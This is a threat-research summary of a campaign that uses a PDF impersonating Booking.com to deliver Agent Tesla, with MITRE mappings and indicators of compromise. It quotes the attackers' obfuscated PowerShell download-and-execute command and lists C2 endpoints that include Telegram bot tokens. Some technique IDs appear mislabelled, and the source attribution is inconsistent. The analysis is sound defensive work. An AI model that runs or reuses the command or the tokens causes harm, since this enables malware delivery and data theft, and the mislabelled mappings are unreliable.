Threat Research

Online Travelers at Risk: Agent Tesla Malware Attacks Travel Industry

Securonix

An analysis of a travel-industry phishing campaign delivering Agent Tesla via a PDF attachment impersonating Booking.com to steal data and drop a PowerShell payload. The infection chain progresses from a malicious PDF to obfuscated JavaScript, a download of a final PowerShell stage, a DLL dropper, registry and security evasion, and data exfiltration to Telegram C2 channels.

Keypoints

  • Phishing email impersonates Booking.com and uses a PDF attachment to lure victims into opening malicious content.
  • Static PDF analysis reveals ObjStm and embedded scripts designed to fetch the next-stage payload from remote URLs.
  • The PDF delivers two methods to obtain the final payload: a fake pop-up link and embedded VBScript/JavaScript code.
  • Obfuscated PowerShell is used to download and execute the final Agent Tesla dropper, with multi-layer string obfuscation.
  • Final DLL loads, then performs registry tweaks, AMSI/Defender evasion, and process injection to steal browser credentials and exfiltrate data via Telegram.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The campaign uses a phishing email with a PDF attachment impersonating Booking.com to lure victims. Quote: ‘The email here is an example of scamming and brand impersonation where sender is seeking a refund of a reservation made at Booking.com and asking recipient to check the attached PDF for the card statement.’
  • [T1059.005] VBScript – The PDF contains embedded vbscript ExecuteGlobal code or in some files JavaScript code to download directly final stage remote powershell payload. Quote: ‘Parallelly it has embedded vbscript ExecuteGlobal code or in some files JavaScript code to download directly final stage remote powershell payload’
  • [T1059.007] JavaScript – The PDF embedding uses JavaScript to initiate the download of the next stage payload. Quote: ‘Parallelly it has embedded vbscript ExecuteGlobal code or in some files JavaScript code to download directly final stage remote powershell payload’
  • [T1086] PowerShell – The final stage payload is downloaded via PowerShell with obfuscation and execution steps. Quote: ‘powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25[.]blogspot[.]com//////////////atom.xml) | . (‘i*&*&*x’).replace(‘*&*&*’,’e’);Start-Sleep -Seconds 5”
  • [T1105] Ingress Tool Transfer – The analysis notes two methods to download the next stage payload from remote servers. Quote: ‘From the objects in the PDF, we can see it uses two different methods to download the next stage payload.’
  • [T1112] Modify Registry – The dropper changes registry keys (CLSIDs) and DLL names, affecting AMSI/Defender. Quote: ‘modifying registries sets up CLSID in the registry with a DLL name “C:IDontExist.dll”. The registry changes also affects AMSI and disables it by overriding the Microsoft Defender COM objects.’
  • [T1562.001] Impair Defenses – The malware disables security features and overrides Defender components. Quote: ‘disable security features executed with admin privileges. Next, the script makes changes to registry, services, and firewalls using netsh.’
  • [T1055] Process Injection – After dropping the final DLL, it injects into Regsvcs.exe and MSbuild.exe. Quote: ‘After dropping the final .dll file, it performs process injection in Regsvcs.exe and MSbuild.exe.’
  • [T1041] Exfiltration Over C2 Channel – Exfiltrated data is sent to a private Telegram chat room. Quote: ‘it … sends the exfiltrated data to a private Telegram chat room.’
  • [T1059.005] Credentials in Browser (Credential Access) – The dropper aims to steal credentials and personal data from web browsers. Quote: ‘the goal of stealing credentials and other personal data from web Browsers and stealing of personal data.’

Indicators of Compromise

  • [Spoofed Senders] Paola@intel-provider[.]com, booking[.]com@stellantises[.]com, and 5 more
  • [PDF Hashes] f7c625f1d3581aa9a3fb81bb26c02f17f0a4004e, c82467b08c76b2e7a2239e0e1c7c5df7519316e2, and 2 more hashes
  • [JavaScript Hashes] a1c7b79e09df8713c22c4b8f228af4869502719a, 67ccb505a1e6f3fa18e2a546603f8335d777385b, and 1 more
  • [PowerShell Hashes] a1919c59ab67de195e2fe3a835204c9f1750f319, 83e8d610343f2b57a6f6e4608dec6f030e0760da, and 1 more
  • [DLL Hashes] a7dd09b4087fd620ef59bed5a9c51295b3808c35, ffcd7a3a80eb0caf019a6d30297522d49311feec, and 1 more
  • [Malicious URLs] hotelofficeewn[.]blogspot[.]com////////////atom.xml, bo0klng[.]blogspot[.]com/, bit[.]ly/newbookingupdates, bio0king[.]blogspot[.]com/
  • [Malicious URLs] htloctmain25[.]blogspot[.]com//////////////atom.xml, bitbucket[.]org/!api/2.0/snippets/nigalulli/eqxGG9/a561b2b0d79b4cc9062ac8ef8fbc0659df660611/files/file, booking-c.blogspot[.]com////////atom[.]xml
  • [Malicious URLs] htlfeb24[.]blogspot[.]com//////////////////////////////atom.xml, bit[.]ly/newbookingupdate, 4c1c6c2c-3624-42cb-a147-0b3263050851[.]usrfiles[.]com/ugd/4c1c6c_a6f8a2e6200e45219ab51d2fea9439ff.txt
  • [C2s] Api[.]telegram[.]org/bot6796626947:AAGohe-IHhj5LD7VpBLcRBukReMwBcOmiTo/sendDocument, Api[.]telegram[.]org/bot6775303908:AAHd23oi4Hfc-xrVIpxaoy_LMKRuUmb2KZM/sendDocument

Read more: https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry